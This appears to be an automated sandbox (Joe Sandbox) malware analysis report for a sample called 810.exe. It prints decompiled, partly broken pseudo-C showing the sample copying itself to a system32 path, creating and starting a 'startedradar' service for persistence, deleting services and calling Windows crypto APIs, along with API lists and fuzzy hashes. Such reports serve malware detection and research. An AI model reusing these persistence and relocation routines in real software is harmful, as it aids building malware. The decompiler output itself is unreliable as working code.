_E9e3X1YKeRS, xrefs: 000F24B8, 000F24C0

Memory Dump Source

Source File: 00000007.00000002.1686856986.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f0000_810.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: ed928f827a9acc6992e72ba3060748723296ca5078bd368d551041fc945fa559
Instruction ID: 7d637c2b49ae3f1757e00b31e451c8333a8d0510688387d63113f59bd239dff6
Opcode Fuzzy Hash: ed928f827a9acc6992e72ba3060748723296ca5078bd368d551041fc945fa559
Instruction Fuzzy Hash: 9AF0CDB1D007188FE720CF68EC012687BF0FB49312F0042AACB08ABB54D7382944EF81

Uniqueness

Uniqueness Score: 0.21%

Function 0011FEB0, Relevance: 3.0, APIs: 2, Instructions: 16
serviceCOMMON

C-Code - Quality: 47%

			E0011FEB0(void* __ecx, void* __edi, void* __esi) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t6;
				void* _t7;
				void* _t15;
				int _t18;
				int _t23;
				void* _t28;
				void* _t33;
				void* _t35;

				_t34 = __esi;
				_t33 = __edi;
				_t28 = __ecx;
				_t6 =  *0x125a04; // 0x3c4e0000
				 *0x126d58 = _t6;
				_push(__esi);
				_t7 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_t49 = _t7;
				if(_t7 != 0) {
					 *0x1263cc = 1; // executed
					CloseServiceHandle(_t7); // executed
				}
				goto 0x311ec4;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("popfd");
				asm("int3");
				memset(??, ??, ??);
				GetModuleFileNameW(0, "C:\Users\luketaylor\810.exe", 0x104);
				_push(_t28);
				_t35 = L00111C60(0x124360, 0x2f8, _t34);
				_t32 = _t35;
				L0011F610(0x127cd0, _t35);
				E0011F6F0(HeapFree(GetProcessHeap(), 0, _t35), _t35, _t33, _t35);
				_t15 = L0011F870(); // executed
				L0011F900(_t15, _t35); // executed
				L0011F770(0x127cd0, _t35, _t35, _t49); // executed
				_t18 = lstrcmpiW("C:\Users\luketaylor\810.exe", "C:\Windows\system32\startedradar.exe");
				if(_t18 != 0) {
					L0011FB80(0x127cd0); // executed
					__eflags =  *0x1263cc;
					if( *0x1263cc == 0) {
						goto 0x311ede;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						_v92.cb = 0x44;
						_t23 = CreateProcessW("C:\Windows\system32\startedradar.exe", 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v20);
						__eflags = _t23;
						if(_t23 != 0) {
							CloseHandle(_v20);
							_t23 = CloseHandle(_v20.hThread);
						}
						goto 0x311ef4;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						return _t23;
					} else {
						L0011FD90(0x127cd0, _t32, _t35); // executed
						return 1;
					}
				} else {
					return _t18; // executed
				}
			}

0x0011feb0
0x0011feb0
0x0011feb0
0x0011feb3
0x0011febb
0x0011fec0
0x0011feca
0x0011fed0
0x0011fed2
0x0011fed5
0x0011fedf
0x0011fedf
0x0011fee5
0x0011feea
0x0011feeb
0x0011feec
0x0011feed
0x0011feee
0x0011feef
0x0011fef0
0x0011fef1
0x0011ff06
0x0011ff0c
0x0011ff1f
0x0011ff21
0x0011ff28
0x0011ff3d
0x0011ff42
0x0011ff47
0x0011ff4c
0x0011ff5b
0x0011ff63
0x0011ff6a
0x0011ff6f
0x0011ff76
0x0011ff87
0x0011ff8c
0x0011ff8d
0x0011ff8e
0x0011ff8f
0x0011ff98
0x0011ffba
0x0011ffc0
0x0011ffc2
0x0011ffc7
0x0011ffd0
0x0011ffd0
0x0011ffd6
0x0011ffdb
0x0011ffdc
0x0011ffdd
0x0011ffde
0x0011ffdf
0x0011ff78
0x0011ff78
0x0011ff86
0x0011ff86
0x0011ff65
0x0011ff69
0x0011ff69

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0011FECA
CloseServiceHandle.ADVAPI32(00000000), ref: 0011FEDF

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandleManagerOpenService
String ID:
API String ID: 1199824460-0
Opcode ID: f71cd1acf51fbd4515396ebf8b97c94f00edbe340039c8f808ea29cee0801dc3
Instruction ID: d99022ca6c8d1b0691f784ad4f9a74e21589f507cd2b51352988872730eab234
Opcode Fuzzy Hash: f71cd1acf51fbd4515396ebf8b97c94f00edbe340039c8f808ea29cee0801dc3
Instruction Fuzzy Hash: CCD05B30340314BFD334DF95AC49B623BECA704B01F000014F509C6DE1EB7054D18B65

Uniqueness

Uniqueness Score: 0.02%

Function 00111C07, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

APIs

Process32FirstW.KERNEL32 ref: 00111C13
CloseHandle.KERNEL32 ref: 00111C51

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseFirstHandleProcess32
String ID:
API String ID: 917458368-0
Opcode ID: 637010728f7366a1a6fa331622021253c36f07e3130f07a32d589d2f19713291
Instruction ID: 4df1a548fee4d717232d045a4c701623621a6827f6e165c86db445a87a41a558
Opcode Fuzzy Hash: 637010728f7366a1a6fa331622021253c36f07e3130f07a32d589d2f19713291
Instruction Fuzzy Hash: 47C08C30109014FBD36E1BA1AC0CAFF3A3DAF1A301F208400E002D0800C7748AE28EA5

Uniqueness

Uniqueness Score: 0.01%

Function 0011F89E, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

APIs

CreateFileMappingW.KERNELBASE ref: 0011F89E
CloseHandle.KERNEL32 ref: 0011F8E8

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseCreateFileHandleMapping
String ID:
API String ID: 3834335185-0
Opcode ID: a5544ab93e2b0ac4ce415888336a0ec340d66f13b30bf660a1decc35d9895c4f
Instruction ID: d6b8bdb448c1760d609088045d42a90a56be421f481eec7c812c33a8fd07a160
Opcode Fuzzy Hash: a5544ab93e2b0ac4ce415888336a0ec340d66f13b30bf660a1decc35d9895c4f
Instruction Fuzzy Hash: E4B02B37100510D303122718740C0CD2725A7D43123130033E10181514DF30C4C30840

Uniqueness

Uniqueness Score: 0.03%

Function 00111C38, Relevance: 3.0, APIs: 2, Instructions: 7COMMON

APIs

Process32NextW.KERNEL32 ref: 00111C38
CloseHandle.KERNEL32 ref: 00111C51

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandleNextProcess32
String ID:
API String ID: 4007157957-0
Opcode ID: 5f6ee1396d49d70d3a275d929841ab0061034abaf5c001bef845613466e74c2c
Instruction ID: 5e815a2af1221decbbadfc44bf7db9fed461c95f98ce7c834c39d508512ea5df
Opcode Fuzzy Hash: 5f6ee1396d49d70d3a275d929841ab0061034abaf5c001bef845613466e74c2c
Instruction Fuzzy Hash: E2B0922020E000E7426E0B656808AE92A296A16B413148811E002C8810DF6085F2AD61

Uniqueness

Uniqueness Score: 0.01%

Function 0011F6F1, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

C-Code - Quality: 100%

			E0011F6F1(void* __eax, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				void* _t19;

				_t15 = __edi;
				 *((intOrPtr*)(_t19 + __edx - 0x17)) =  *((intOrPtr*)(_t19 + __edx - 0x17)) + __edx;
			}

0x0011f6f1
0x0011f6f6

APIs

SHGetFolderPathW.SHELL32 ref: 0011F706

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: cdc78d7b30f02383cbff2f8827e312ed0da3d53d841dede410343cdc412a968c
Instruction ID: 14b9c5e6a264c0aeaf970d1de0d3fac2f681ef38fcf26e1ad73d78b30c4a046d
Opcode Fuzzy Hash: cdc78d7b30f02383cbff2f8827e312ed0da3d53d841dede410343cdc412a968c
Instruction Fuzzy Hash: 26C02B3440C0978BC32E0B2139841F83F30BE163007251938C04544C50E310116A9750

Uniqueness

Uniqueness Score: 0.01%

Function 0011F5E0, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				L0011D340();
				L0011DF80(); // executed
				_t3 = L00111030(); // executed
				_t11 = _t3;
				if(_t3 != 0) {
					L0011CE80(_t5, _t6, _t7, _t8, _t11); // executed
				}
				ExitProcess(0);
			}

0x0011f5e6
0x0011f5eb
0x0011f5f0
0x0011f5f5
0x0011f5f7
0x0011f5f9
0x0011f5f9
0x0011f600

APIs

ExitProcess.KERNEL32 ref: 0011F600

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b7ce157e39f2b82fcdb66b00eb1d98e08bc00a2c8f03f06a9efc3a2dd90e2775
Instruction ID: f4c0590a338849ff50dc231e5bb423eec06045546e396c34ee774b3dc29b6e69
Opcode Fuzzy Hash: b7ce157e39f2b82fcdb66b00eb1d98e08bc00a2c8f03f06a9efc3a2dd90e2775
Instruction Fuzzy Hash: 9FC08C70226612A3D21C33F42C077CE78091F20750F000230FA60840C2AF50A1C280BB

Uniqueness

Uniqueness Score: 0.01%

Function 0011129E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

APIs

GetFileAttributesW.KERNELBASE ref: 0011129E

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b4194567ea0f5af82eca87c380d782bc45e6471a9ce95ac0f4e92dc76088827a
Instruction ID: 178b12a4ebb606040eea426a1fe66a1c26b107a5d3e063a55f2342c8851494be
Opcode Fuzzy Hash: b4194567ea0f5af82eca87c380d782bc45e6471a9ce95ac0f4e92dc76088827a
Instruction Fuzzy Hash: FFC08020404600E55F3D41249C043FA5155770D3B8F714F17EF73D04E483F808D05215

Uniqueness

Uniqueness Score: 0.01%

Function 0011F883, Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

APIs

CreateFileW.KERNELBASE ref: 0011F885

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5ccbefab1c65bef460447de08eda83015a1aee49e13e502e493c10d262f56492
Instruction ID: 380b6a8dbc20a246f45e2fcfe1a6a96ebe6fff6378e84d23ba5bcea0ec3bcb93
Opcode Fuzzy Hash: 5ccbefab1c65bef460447de08eda83015a1aee49e13e502e493c10d262f56492
Instruction Fuzzy Hash: 92B012324040354F422C363CB74C0EC120052493303260BB2DEB757DE49E204CD31AC1

Uniqueness

Uniqueness Score: 0.01%

Function 00111BF0, Relevance: 1.5, APIs: 1, Instructions: 8processCOMMON

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00111BF4

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 871dfedb4884ccaf2fe43258d264050c94b0ecf7b3b7aa7791706743ad832cfa
Instruction ID: 24e40a408fb70d0c3078bc536dd7b0ab7cd50663fdf2958e35b8106840142946
Opcode Fuzzy Hash: 871dfedb4884ccaf2fe43258d264050c94b0ecf7b3b7aa7791706743ad832cfa
Instruction Fuzzy Hash: 7DB09B3154491057437D513D15880F45145154D3743295735CD7AD75E1AEB54CDB1441

Uniqueness

Uniqueness Score: 0.01%

Non-executed Functions

Function 00112217, Relevance: 12.1, APIs: 8, Instructions: 60memoryencryptionCOMMON

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 00112223
RtlAllocateHeap.NTDLL(00000000), ref: 0011222A
CryptDuplicateHash.ADVAPI32(?,?,?,?), ref: 0011224F
memcpy.NTDLL(?,?,?,?,?,?), ref: 00112264
CryptEncrypt.ADVAPI32(?,?,00000001,?,?,?), ref: 00112281
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 001122CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 001122DA
HeapFree.KERNEL32(00000000), ref: 001122E1

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$Crypt$HashProcess$AllocateDestroyDuplicateEncryptFreememcpy
String ID:
API String ID: 1815259051-0
Opcode ID: 80c1ef053a307d60f5f16748221ed3b02d8857f6ae1cb93a1a9336b566a23326
Instruction ID: 97291cbcb0ccf939e679c5ad497e9892c57fb3125ec28a04d6802b067dbd3b48
Opcode Fuzzy Hash: 80c1ef053a307d60f5f16748221ed3b02d8857f6ae1cb93a1a9336b566a23326
Instruction Fuzzy Hash: DD11C671A00209FFDB218FA4DD48BAEBFB9FF08351F144165F909D6560E7718AA1DB90

Uniqueness

Uniqueness Score: 0.09%

Function 0011233E, Relevance: 10.6, APIs: 7, Instructions: 59memoryencryptionCOMMON

APIs

RtlAllocateHeap.NTDLL ref: 00112347
CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 0011236D
memcpy.NTDLL(?,?), ref: 00112381
CryptDecrypt.ADVAPI32(?,?,00000001,00000000,?,?), ref: 0011239D
CryptDestroyHash.ADVAPI32(?,?,?), ref: 001123CC
GetProcessHeap.KERNEL32(00000000), ref: 001123DF
HeapFree.KERNEL32(00000000), ref: 001123E6

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CryptHeap$Hash$AllocateDecryptDestroyDuplicateFreeProcessmemcpy
String ID:
API String ID: 1169412687-0
Opcode ID: f65c9b168cae067afb64b3d649759020b74b2055c6ae100b5ee27f444f63990f
Instruction ID: ee7f4c00044dd6df610d453f08ca42ee5c658e79bdb418a27be455e838bb3c9a
Opcode Fuzzy Hash: f65c9b168cae067afb64b3d649759020b74b2055c6ae100b5ee27f444f63990f
Instruction Fuzzy Hash: B4114671A00209FFDB258F94DC88BADBBB9FF08301F100161F915E66A0E77199A19B51

Uniqueness

Uniqueness Score: 7.75%

Function 0011FD10, Relevance: 9.0, APIs: 6, Instructions: 37
servicememoryUNIQUE

C-Code - Quality: 65%

			E0011FD10(void* __ecx, void* __esi, void* __eflags) {
				void* _t3;
				void* _t9;
				int _t10;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t23;

				_t16 = __ecx;
				_t3 = L00111D00(0x123d20, _t15, __ecx);
				_t20 = _t3;
				 *0x1259dc(_t23 - 0x208, 0x104, _t20,  *0x12610c, 0x67165621);
				HeapFree(GetProcessHeap(), 0, _t20);
				_t9 = OpenServiceW(_t16, _t23 - 0x208, 0x10000);
				_t17 = _t9;
				if(_t17 == 0) {
					goto 0x311e1d;
					asm("int3");
					asm("int3");
					return _t9;
				} else {
					_t10 = DeleteService(_t17);
					CloseServiceHandle(_t17);
					return _t10;
				}
			}

0x0011fd10
0x0011fd1c
0x0011fd27
0x0011fd36
0x0011fd49
0x0011fd5c
0x0011fd62
0x0011fd66
0x0011fd80
0x0011fd85
0x0011fd86
0x0011fd87
0x0011fd68
0x0011fd69
0x0011fd72
0x0011fd7f
0x0011fd7f

APIs

_snwprintf.NTDLL ref: 0011FD36
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FD42
HeapFree.KERNEL32(00000000), ref: 0011FD49
OpenServiceW.ADVAPI32(?,?,00010000), ref: 0011FD5C
DeleteService.ADVAPI32(00000000,?,?,00010000), ref: 0011FD69
CloseServiceHandle.ADVAPI32(00000000,?,?,00010000), ref: 0011FD72

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Service$Heap$CloseDeleteFreeHandleOpenProcess_snwprintf
String ID:
API String ID: 4257195289-0
Opcode ID: c8e191413a357ac31370f01d48544af6bd1e89deab6b8b3245a8b89dc4fc7d63
Instruction ID: 3fbb4371417d55badec9418614ab06cc95a32112264aad90f70111ad65f7d626
Opcode Fuzzy Hash: c8e191413a357ac31370f01d48544af6bd1e89deab6b8b3245a8b89dc4fc7d63
Instruction Fuzzy Hash: F3F09632500114B7CB2157E4AC4CAEEB66DDB4C762F010166FA09D2551DF7148F28BA1

Uniqueness

Uniqueness Score: 100.00%

Function 00112292, Relevance: 6.0, APIs: 4, Instructions: 36
memoryencryptionCOMMON

C-Code - Quality: 50%

			E00112292(void* __eax, void* __ebx, void** __edi) {
				void** _t23;
				void* _t25;
				void* _t27;

				_t23 = __edi;
				if(L00112080(__eax,  *((intOrPtr*)(__eax + 4)),  *((intOrPtr*)(__eax + 8))) != 0) {
					 *((intOrPtr*)(_t27 - 0x14)) = 0x14;
					 *0x124afc( *((intOrPtr*)(_t27 + 8)), 2, __ebx + 0x60, _t27 - 0x14, _t25);
					_t25 =  !=  ? 1 : _t25;
				}
				 *0x124a38( *((intOrPtr*)(_t27 + 8)));
				if(_t25 == 0) {
					HeapFree(GetProcessHeap(), 0,  *_t23);
					 *_t23 = 0;
					_t23[1] = 0;
				}
				return _t25;
			}

0x00112292
0x001122a2
0x001122a8
0x001122b9
0x001122c6
0x001122c6
0x001122cc
0x001122d4
0x001122e1
0x001122e7
0x001122ed
0x001122ed
0x001122fc

APIs

CryptGetHashParam.ADVAPI32(?,00000002,?,?), ref: 001122B9
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 001122CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 001122DA
HeapFree.KERNEL32(00000000), ref: 001122E1

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CryptHashHeap$DestroyFreeParamProcess
String ID:
API String ID: 2852584936-0
Opcode ID: a589abd22937f55e1e94819d929b8402cca36810b3950c2f23e6ccb39172f505
Instruction ID: dd5a8fb4b45e5662338c8ca5543a7f317d105390d4d281e0b15edced081f193b
Opcode Fuzzy Hash: a589abd22937f55e1e94819d929b8402cca36810b3950c2f23e6ccb39172f505
Instruction Fuzzy Hash: E5F06271600105AFDB209F90DC49BAABBA9FF04301F004125FD09D76A1D7B1CDA1CB91

Uniqueness

Uniqueness Score: 0.09%

Function 001123B0, Relevance: 6.0, APIs: 4, Instructions: 27
memoryencryptionCOMMON

C-Code - Quality: 23%

			E001123B0(void* __eax, long* __ebx, void** __edi, void* __esi) {
				void* _t17;
				void* _t19;

				asm("pushad");
				 *0x124994( *((intOrPtr*)(_t19 - 8)),  *((intOrPtr*)(_t19 - 0xc)));
				_t17 =  !=  ? 1 : __esi;
				 *0x124a38( *((intOrPtr*)(_t19 - 8)));
				if(_t17 == 0) {
					HeapFree(GetProcessHeap(), 0,  *__edi);
					 *__edi = 0;
					 *__ebx = 0;
				}
				return _t17;
			}

0x001123b2
0x001123b9
0x001123c6
0x001123cc
0x001123d4
0x001123e6
0x001123ec
0x001123f2
0x001123f2
0x00112400

APIs

CryptVerifySignatureW.ADVAPI32(?,?), ref: 001123B9
CryptDestroyHash.ADVAPI32(?,?,?), ref: 001123CC
GetProcessHeap.KERNEL32(00000000), ref: 001123DF
HeapFree.KERNEL32(00000000), ref: 001123E6

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CryptHeap$DestroyFreeHashProcessSignatureVerify
String ID:
API String ID: 2013711131-0
Opcode ID: 23a8ac9ae169aff637b63b11af86563990ab073609840ad118158abc570945ed
Instruction ID: 97df98ed2b80eaccff943a1d4c4d6b8158f88a2901039b7e77293ac23c9b43e9
Opcode Fuzzy Hash: 23a8ac9ae169aff637b63b11af86563990ab073609840ad118158abc570945ed
Instruction Fuzzy Hash: 84E06D31A04214FBDB260F94EC487ACBFB6FF08312F010065E90A965A0E7B608F29B81

Uniqueness

Uniqueness Score: 7.75%

Function 001121A9, Relevance: 6.0, APIs: 4, Instructions: 14
encryptionCOMMON

C-Code - Quality: 68%

			E001121A9(void* __eax) {
				void* _t3;

				_t3 =  *0x124ab8();
				if(_t3 == 0) {
					CryptDestroyKey( *0x127ca8);
					CryptDestroyKey( *0x127ca4);
					CryptReleaseContext( *0x127ca0, 0);
					return 0;
				} else {
					goto 0x310808;
					return _t3;
				}
			}

0x001121ae
0x001121b6
0x001121c4
0x001121d0
0x001121de
0x001121e6
0x001121b8
0x001121b8
0x001121bd
0x001121bd

APIs

CryptCreateHash.ADVAPI32 ref: 001121AE
CryptDestroyKey.ADVAPI32 ref: 001121C4
CryptDestroyKey.ADVAPI32 ref: 001121D0
CryptReleaseContext.ADVAPI32(00000000), ref: 001121DE

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Crypt$Destroy$ContextCreateHashRelease
String ID:
API String ID: 4057265880-0
Opcode ID: f209486787cbfdca2d2bd98e15943a8d1d5c3d1a83455bba047735e8a2b73957
Instruction ID: 4b9ebed1d9187259dd63ea403f826ff1b056b66e5665902127693e15258e40a8
Opcode Fuzzy Hash: f209486787cbfdca2d2bd98e15943a8d1d5c3d1a83455bba047735e8a2b73957
Instruction Fuzzy Hash: 00D06C30199102BFDB262F74EE09B463BA5EB18343B510424B102E5CB0EF3194F2AB48

Uniqueness

Uniqueness Score: 0.02%

Function 0011FE73, Relevance: 4.5, APIs: 3, Instructions: 16
serviceCOMMON

C-Code - Quality: 53%

			E0011FE73(void* __edi) {
				void* _t6;
				void* _t9;
				int _t11;
				void* _t16;

				_t9 = __edi;
				_t11 = StartServiceW(??, ??, ??);
				CloseServiceHandle(_t6);
				L0011FD00(__edi, _t11, _t16);
				CloseServiceHandle(_t9);
				return _t11;
			}

0x0011fe73
0x0011fe7a
0x0011fe7c
0x0011fe88
0x0011fe8e
0x0011fe9c

APIs

StartServiceW.ADVAPI32 ref: 0011FE73
CloseServiceHandle.ADVAPI32 ref: 0011FE7C
CloseServiceHandle.ADVAPI32(?,?,startedradar,startedradar,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0011FE8E

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Service$CloseHandle$Start
String ID:
API String ID: 390812829-0
Opcode ID: 24c38d8dd90f2c70eb76b089f38e761d98f142dd385cfb091cfdeaf9c21ccc2f
Instruction ID: 6fa9ecff525ac3068222892ae57d04147d3e5d7d91de7066a73e9ca100557996
Opcode Fuzzy Hash: 24c38d8dd90f2c70eb76b089f38e761d98f142dd385cfb091cfdeaf9c21ccc2f
Instruction Fuzzy Hash: 71D01232707010A74D28A7E87C4C07EF7A8E78C26A352017AF90AC2A20EB250CE35781

Uniqueness

Uniqueness Score: 0.04%

Function 00112125, Relevance: 4.5, APIs: 3, Instructions: 15
encryptionCOMMON

C-Code - Quality: 16%

			E00112125(void* __eax) {
				int _t8;
				void* _t10;

				_t8 = CryptImportKey();
				LocalFree( *(_t10 - 4));
				if(_t8 == 0) {
					CryptReleaseContext( *0x127ca0, 0);
				}
				return _t8;
			}

0x00112133
0x00112135
0x0011213d
0x00112147
0x00112147
0x00112153

APIs

CryptImportKey.ADVAPI32 ref: 0011212A
LocalFree.KERNEL32(?), ref: 00112135
CryptReleaseContext.ADVAPI32(00000000), ref: 00112147

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Crypt$ContextFreeImportLocalRelease
String ID:
API String ID: 202888279-0
Opcode ID: b623fe1910e0fd0721478b98559b4ed57659b5e33a97da289a01907e065d3277
Instruction ID: e0ac0330f1d6cefc461a7f4b551b1908a5399cee8c3f0d7357b7979afa492c79
Opcode Fuzzy Hash: b623fe1910e0fd0721478b98559b4ed57659b5e33a97da289a01907e065d3277
Instruction Fuzzy Hash: 00D09E35A55124FBCB316FA4BD087597761E7087A2F510551E905E2A60D7314CB196C0

Uniqueness

Uniqueness Score: 0.02%

Function 0011218B, Relevance: 4.5, APIs: 3, Instructions: 12encryptionCOMMON

APIs

CryptGenKey.ADVAPI32 ref: 00112190
CryptDestroyKey.ADVAPI32 ref: 001121D0
CryptReleaseContext.ADVAPI32(00000000), ref: 001121DE

Memory Dump Source

